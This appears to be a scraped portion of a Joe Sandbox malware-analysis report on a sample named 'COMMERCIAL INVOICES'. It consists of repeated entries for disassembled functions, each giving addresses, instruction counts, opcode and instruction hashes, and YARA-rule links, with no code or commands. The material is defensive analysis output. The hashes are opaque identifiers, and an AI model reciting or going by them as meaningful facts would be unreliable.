                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 99b645b85c0ce414d332d533fd577958487de48897950a5f6e1b17e731e8e204
                                                                                                                                                                                                                                      • Instruction ID: 56f444a0e60a76343de7ff3393f61e9cf5c8e52b9f1851f0c53a5be99345a2c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99b645b85c0ce414d332d533fd577958487de48897950a5f6e1b17e731e8e204
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0017CB1A1020AABCB04DFA9D441AAEBBF8FF58304F50402AF901E7390D674DA018BA4
                                                                                                                                                                                                                                      Function 0127CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                                                                                      • Instruction ID: feb2a3ad86fb2254a32c16dafa242e130124e0b172e2e2f934ab0987c4e456a4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE01D6312206879FD7269A2DC845BAABBECFF51790F0840A5FB088B691D678C810C250
                                                                                                                                                                                                                                      Function 013161E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c05f76c1ee5b492477deb246655e9d81c390279a568a502e9a181d2b9be85feb
                                                                                                                                                                                                                                      • Instruction ID: a76c40f472f316338c58a109fcfb019da0544cebe5f2fb34e7af3c76d75b4d7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c05f76c1ee5b492477deb246655e9d81c390279a568a502e9a181d2b9be85feb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75018F71A112499BCB04EFA9D441AEEBBF8BF58314F14005AF901A7280D774EA02CB98
                                                                                                                                                                                                                                      Function 012C63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                      • Instruction ID: 7a0e617f5f66a7fbb4823ea3449c9a85360557944ece9ea67975a73ab674fbc0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFF01D7221005DBFEF019F94DD80DBF7B7EFB596D8B104229FA11A2160D631DD21ABA0
                                                                                                                                                                                                                                      Function 012CA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7ba28718038fdc53c9136c8cc6f3a60b6d72a8b841dd46b9cb1c00447ec8cf85
                                                                                                                                                                                                                                      • Instruction ID: d310d60d967d1d83f5783169a94aa88adbe8085f0d0c6641fc4873c27b09c3fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ba28718038fdc53c9136c8cc6f3a60b6d72a8b841dd46b9cb1c00447ec8cf85
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F701893651014DABCF129E84D840EDA7F66FB4C794F058205FE1866220C332D971EB81
                                                                                                                                                                                                                                      Function 0123C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 74b47afe616c2d5111f46d814948960ffab9be55c55e65b1db212a561a63f425
                                                                                                                                                                                                                                      • Instruction ID: f556f8edcc64db4a7d1aa9e7d6e2c721677c62ca994161858e9049dbb7efc5a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74b47afe616c2d5111f46d814948960ffab9be55c55e65b1db212a561a63f425
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F024B23342426BF7149619AC02F3233DAEBD0650F65802BEB459B2C5E9B0DC118394
                                                                                                                                                                                                                                      Function 0127656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 23e0daac101fef5fbada601ab49c64006f8dcd86ea5e5a51849e47842eaabaf1
                                                                                                                                                                                                                                      • Instruction ID: 9e787806cac20a97048841a0feb18181f12d42fb75c2070d04867b4eebadcbd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e0daac101fef5fbada601ab49c64006f8dcd86ea5e5a51849e47842eaabaf1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E201A470622AC3DFF332AB2CDD89B7637A8BB40B84F584190BB028B6D6D778D401C614
                                                                                                                                                                                                                                      Function 012E437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                                      • Instruction ID: a2edb30b06d739c3ddcd020d13e42d6d673996d20fbdccbdafba009fd1c1f8bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49F0E93537199347EB76BF2D8414B7EA7D59F90940B65052C9741CB680DF60D84087A0
                                                                                                                                                                                                                                      Function 012CE872 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                                                                      • Instruction ID: a7cf1009900333f5fa26db4b450a0747afb4661c1776a75085bb97a93304e85b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEF030326615129BD3219A4DCC80F17BB68EF95E60F5A0369AB049B270C660EC018790
                                                                                                                                                                                                                                      Function 012CC89D Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ff9ca3886ea8e82671308681a01daa7e29b71d6fdc946a6fdc47d125522bb87b
                                                                                                                                                                                                                                      • Instruction ID: 54b7c7935a060f9c56eb00bcfd732339b46fa2504b8233c2bfda6c1fc6e4520f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff9ca3886ea8e82671308681a01daa7e29b71d6fdc946a6fdc47d125522bb87b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7F0AF706253459FC310FF68C442A2BB7E4FF98710F40465EB998DB394E634E901CB96
                                                                                                                                                                                                                                      Function 01270854 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                                                                      • Instruction ID: f97f4be5d430d845fba05422ccb9fd7d442763d53d5ea9fac8a4f201c437e4f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F0E9B2620205AFE714DF26CC01F57B7E9EF99340F148078AA45D7260FAB0ED41D658
                                                                                                                                                                                                                                      Function 012CC912 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c5b7e66feea36df26dd2b41666929f99dd60cc6529fe167ff7a3cb341adb8aaa
                                                                                                                                                                                                                                      • Instruction ID: d727d9fbb2f51ee88afeb42dd9e4872b038dad05b0849726be56ffe7eb6525bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5b7e66feea36df26dd2b41666929f99dd60cc6529fe167ff7a3cb341adb8aaa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30F0C270A1124ADFCB04EFA9C511AAEB7B4FF18700F008159B909EB385DA34EA01CB54
                                                                                                                                                                                                                                      Function 012447FB Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 151d262a98a77880ef91c3e158be653c6bb7c98ef9a6e93fe202b2661dbc75a9
                                                                                                                                                                                                                                      • Instruction ID: b4762256e2da49433864f329a78385ffd106c2c55d65c46d350a84adc4631a20
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 151d262a98a77880ef91c3e158be653c6bb7c98ef9a6e93fe202b2661dbc75a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8CF0B4319366D29FF73AEB6CC844B21BBD49B00628F08496ADB8987942C7B5D880C651
                                                                                                                                                                                                                                      Function 01300115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 32500d8db9239dca06281298395e660bc856bc8dd96010119e95f3d0e1732836
                                                                                                                                                                                                                                      • Instruction ID: be8a4901fddba8c75f93c67666c0d562972b34f62f111d7612707837b8336974
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32500d8db9239dca06281298395e660bc856bc8dd96010119e95f3d0e1732836
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FF05CBF429BC01ECF3F5B3C74713E26FE9A741268F0A1099D5A557245C5788583C328
                                                                                                                                                                                                                                      Function 0127C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6552f69247cb2f4d9d21ea49be1e9628ac5eb27cf543a4617dd5594d4efdcf21
                                                                                                                                                                                                                                      • Instruction ID: 9afe7a89a63ffe8632d17385d938407a6ff3c4585ed8defb6720f4e99af54749
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6552f69247cb2f4d9d21ea49be1e9628ac5eb27cf543a4617dd5594d4efdcf21
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70F0E2719316539FE722D73CC1C8B23BBD49B807A5F099465DA1687652C370E8A0CA51
                                                                                                                                                                                                                                      Function 01282619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                                                                      • Instruction ID: 6b08d51ba4e0813fb33b1b3afb74b368642b6516ab6124d1f1d0e72645f1c275
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61E0D8723116416BE712AE598CC0F67776EDFD2B14F040079BA045F292CAE2DC09C2A4
                                                                                                                                                                                                                                      Function 012D6030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                                                                      • Instruction ID: 441c68ec0ef2577849142634e68b66cbda219c4793bced4851cddf322489a7aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDF06572164204DFE3218F49D984F52B7F8FB05365F45C025E7099B561D379EC40CBA4
                                                                                                                                                                                                                                      Function 01240710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                                                                                      • Instruction ID: 688a7d3a6eb9f0e03c777921baa269acee1f4f8bbaec9894b496af0d922ead1d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2F0E5392243459BDB1EDF19C050AE57BA4FB51350F010054FE428B341E7B1E981CB55
                                                                                                                                                                                                                                      Function 012749D0 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                                                                      • Instruction ID: 0c00015661a0c8ef4a284a938b8686d121871a60f9e744af5eb013a858041be3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E0D8326741C6ABD3223A598821F6B77A5DBD87A0F150429E7008B160EBB0EC40D7D8
                                                                                                                                                                                                                                      Function 01314164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 94b6ddc4a7b064d16d59dba6076b7a8ebe8d4654bc0a1769b92b56525d91a2b4
                                                                                                                                                                                                                                      • Instruction ID: 80333e73f898b51dec56e8ff2445fe73679b6e1102139d025ad85e4b1aa18008
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94b6ddc4a7b064d16d59dba6076b7a8ebe8d4654bc0a1769b92b56525d91a2b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7F09B31A355914FE77AD72CD584F5577E4AF10738F1A19B4D40A8795AC734DC40C650
                                                                                                                                                                                                                                      Function 012E678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                                                                      • Instruction ID: ef5920042e531229ff5a71f36882956eeeef7d8270b568e65c0b344828167df4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BE0DF32A90110BBEB22A7998D05FABBEADDBA4EA0F050055BB00E7090E530EE00D690
                                                                                                                                                                                                                                      Function 013108C0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                                                                      • Instruction ID: 083841ccc67073755758e47dae191bc739f4081f4088514b355ba3d127babe1f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68E09B316443548BCB2D8A2DC140A93BFE8EF9566CF158069ED0547616C231F882C6D0
                                                                                                                                                                                                                                      Function 012425E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 12587b3b1f7053fb9730c8c8ce316b07b32ff744446acde32b7cd365fdb473a8
                                                                                                                                                                                                                                      • Instruction ID: 6b2c4ae2b3512d1e1ff0a1d65c76dac9f189f060f1943f8aac10568dd0881f33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12587b3b1f7053fb9730c8c8ce316b07b32ff744446acde32b7cd365fdb473a8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49E09272110594ABC326FF2ADD01FAA779AEF603A0F014515F11557190CA30A950C798
                                                                                                                                                                                                                                      Function 012FA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                                                                      • Instruction ID: 18e277b9ccfa3318c103061975f365f054ca4156a89041938bebf18998165199
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43E06531021A52DBE732AB2AD848B66BBE0EF50711F14882CA29A128B0C7B598C0CA40
                                                                                                                                                                                                                                      Function 012C4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
